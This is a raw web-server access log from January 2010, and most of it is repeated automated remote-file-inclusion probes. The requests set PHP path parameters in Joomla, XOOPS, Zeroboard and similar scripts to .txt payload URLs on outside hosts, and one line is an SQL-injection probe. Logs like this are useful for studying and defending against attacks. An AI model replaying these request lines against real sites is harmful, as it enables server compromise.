115.68.3.94 - - [05/Jan/2010:00:45:46 -0500] "GET //skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:45:49 -0500] "GET /logs/access_log.Q109092300%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:45:50 -0500] "GET /logs//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:45:50 -0500] "GET /logs/access_log.Q109092300%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:45:53 -0500] "GET //setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:45:53 -0500] "GET /logs/access_log.Q109120800%20%20//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:45:53 -0500] "GET /logs//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:45:54 -0500] "GET /logs/access_log.Q109122000%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
213.254.218.44 - - [05/Jan/2010:00:45:55 -0500] "GET /logs/access_log.Q109121000//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:45:55 -0500] "GET /logs//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:45:55 -0500] "GET //setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:45:55 -0500] "GET /logs/access_log.Q109120800%20%20//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:45:56 -0500] "GET /logs/access_log.Q109122000%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:45:58 -0500] "GET /logs//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:45:58 -0500] "GET /logs/access_log.Q109112100//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:45:58 -0500] "GET //skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:46:02 -0500] "GET /logs/access_log.Q109121000%20%20//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:46:03 -0500] "GET /logs/access_log.Q109121000%20%20//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:03 -0500] "GET /logs/access_log.Q109112100//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:03 -0500] "GET /logs//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:46:05 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:46:05 -0500] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:46:05 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:46:05 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:46:06 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:46:06 -0500] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:06 -0500] "GET //skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:46:16 -0500] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:23 -0500] "GET /logs/access_log.Q109072200//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:23 -0500] "GET /logs//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:23 -0500] "GET //skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:46:25 -0500] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
88.212.201.94 - - [05/Jan/2010:00:46:27 -0500] "GET /logs/access_log.Q109090800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
88.212.201.94 - - [05/Jan/2010:00:46:27 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.212.201.94 - - [05/Jan/2010:00:46:27 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:29 -0500] "GET //skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:29 -0500] "GET /logs/access_log.Q109112100%20%20//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:29 -0500] "GET /logs//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:32 -0500] "GET //skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:32 -0500] "GET /logs//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:32 -0500] "GET /logs/access_log.Q109112100%20%20//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
88.212.201.94 - - [05/Jan/2010:00:46:39 -0500] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:46:50 -0500] "GET /logs/access_log.Q109051700//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:47:10 -0500] "GET /logs/access_log.Q109051700//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:47:12 -0500] "GET /logs/access_log.Q109102700%20%20//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:47:12 -0500] "GET /logs/access_log.Q109102700%20%20//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.254.218.44 - - [05/Jan/2010:00:47:47 -0500] "GET /logs/access_log.Q109121000//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:00:48:53 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.251.165.181 - - [05/Jan/2010:00:49:09 -0500] "GET /logs/access_log.Q109080500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:49:19 -0500] "GET /logs/access_log.Q109080500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:49:44 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:49:44 -0500] "GET /logs/access_log.Q109102100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:49:44 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:00:49:51 -0500] "GET /logs/error_log.Q109122000 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
200.93.147.154 - - [05/Jan/2010:00:50:13 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:13 -0500] "GET /logs/access_log.Q109102100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:13 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:16 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:19 -0500] "GET /logs/access_log.Q109102100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:20 -0500] "GET /?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:21 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:50:32 -0500] "GET /shop.php?prod=http://musicadelibreria.net/footer? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:50:32 -0500] "GET /logs/access_log.Q109080700%20%20/shop.php?prod=http://musicadelibreria.net/footer? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.110 - - [05/Jan/2010:00:50:32 -0500] "GET /logs/shop.php?prod=http://musicadelibreria.net/footer? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:36 -0500] "GET /?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:36 -0500] "GET /logs/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:00:50:42 -0500] "GET /logs/access_log.Q109080700/shop.php?prod=http://musicadelibreria.net/footer? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:43 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:43 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:50:44 -0500] "GET /logs/access_log.Q109121000//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:45 -0500] "GET /?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:45 -0500] "GET /logs/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:45 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:46 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:46 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:46 -0500] "GET /?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:46 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:47 -0500] "GET /logs/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:50:47 -0500] "GET /logs/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:51 -0500] "GET /logs/access_log.Q109102100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:50:54 -0500] "GET /logs/access_log.Q109102100//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:51:00 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:51:01 -0500] "GET /logs/access_log.Q109102100//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:51:01 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:51:23 -0500] "GET /logs/access_log.Q109091100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:51:29 -0500] "GET /logs/access_log.Q109121000//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:33 -0500] "GET /?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:34 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:34 -0500] "GET /logs/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:38 -0500] "GET /?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:39 -0500] "GET /logs/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:39 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:51:44 -0500] "GET /logs/access_log.Q109120800//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:51:50 -0500] "GET /logs/access_log.Q109091100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:51:51 -0500] "GET /logs/access_log.Q109091100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:53 -0500] "GET /?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:53 -0500] "GET /logs/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:51:53 -0500] "GET /logs/access_log.Q109101500/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
59.24.49.35 - - [05/Jan/2010:00:51:59 -0500] "GET /logs/access_log.Q109120800//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:52:00 -0500] "GET /logs/access_log.Q109101500/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:52:00 -0500] "GET /?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:00:52:00 -0500] "GET /logs/?sourcedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 200 32908 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:52:26 -0500] "GET /logs/access_log.Q109091100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:53:20 -0500] "GET /logs/access_log.Q109072600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:53:20 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
216.131.95.183 - - [05/Jan/2010:00:53:23 -0500] "GET /logs/access_log.Q109100400//catalog.php?cid='' HTTP/1.1" 404 237 "-" "libwww-perl/5.831"
216.131.95.183 - - [05/Jan/2010:00:53:24 -0500] "GET //catalog.php?cid='' HTTP/1.1" 404 210 "-" "libwww-perl/5.831"
216.131.95.183 - - [05/Jan/2010:00:53:24 -0500] "GET /logs//catalog.php?cid='' HTTP/1.1" 404 215 "-" "libwww-perl/5.831"
115.68.3.94 - - [05/Jan/2010:00:53:24 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:53:25 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:53:29 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
95.112.164.179 - - [05/Jan/2010:00:53:40 -0500] "GET /robots.txt HTTP/1.0" 404 208 "http://majestic12.co.uk/bot.php?I=B4BEE8E9DE-209D77060277AD99-www_aceonlinestore_com" "Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
95.112.164.179 - - [05/Jan/2010:00:53:41 -0500] "GET /logs/access_log.Q109052700 HTTP/1.1" 200 4217417 "http://www.oounet.com/index/click?url=http://www.aceonlinestore.com/logs/access_log.Q109052700&query_id=41470&lang=" "Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
216.131.95.183 - - [05/Jan/2010:00:53:50 -0500] "GET /logs/access_log.Q109101000//catalog.php?cid='' HTTP/1.1" 404 237 "-" "libwww-perl/5.831"
115.68.3.94 - - [05/Jan/2010:00:53:54 -0500] "GET /logs/access_log.Q109072600%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:53:54 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:53:58 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:54:04 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:54:04 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:54:04 -0500] "GET /logs/access_log.Q109072600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:00:54:15 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.120.104.41 - - [05/Jan/2010:00:54:19 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; CIBA)"
125.120.104.41 - - [05/Jan/2010:00:54:19 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; CIBA)"
125.120.104.41 - - [05/Jan/2010:00:54:20 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; CIBA)"
125.120.104.41 - - [05/Jan/2010:00:54:20 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; CIBA)"
125.120.104.41 - - [05/Jan/2010:00:54:23 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; CIBA)"
125.120.104.41 - - [05/Jan/2010:00:54:23 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; CIBA)"
125.120.104.41 - - [05/Jan/2010:00:54:25 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; CIBA)"
125.120.104.41 - - [05/Jan/2010:00:54:25 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; CIBA)"
115.68.3.94 - - [05/Jan/2010:00:54:42 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:54:42 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:54:42 -0500] "GET /logs/access_log.Q109072600%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.249.65.7 - - [05/Jan/2010:00:55:46 -0500] "GET /images/Office%20Supply/psearch_go.gif HTTP/1.1" 200 286 "-" "Googlebot-Image/1.0"
200.93.147.154 - - [05/Jan/2010:00:56:34 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:56:39 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:00:56:43 -0500] "GET /logs/access_log.Q109102100//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
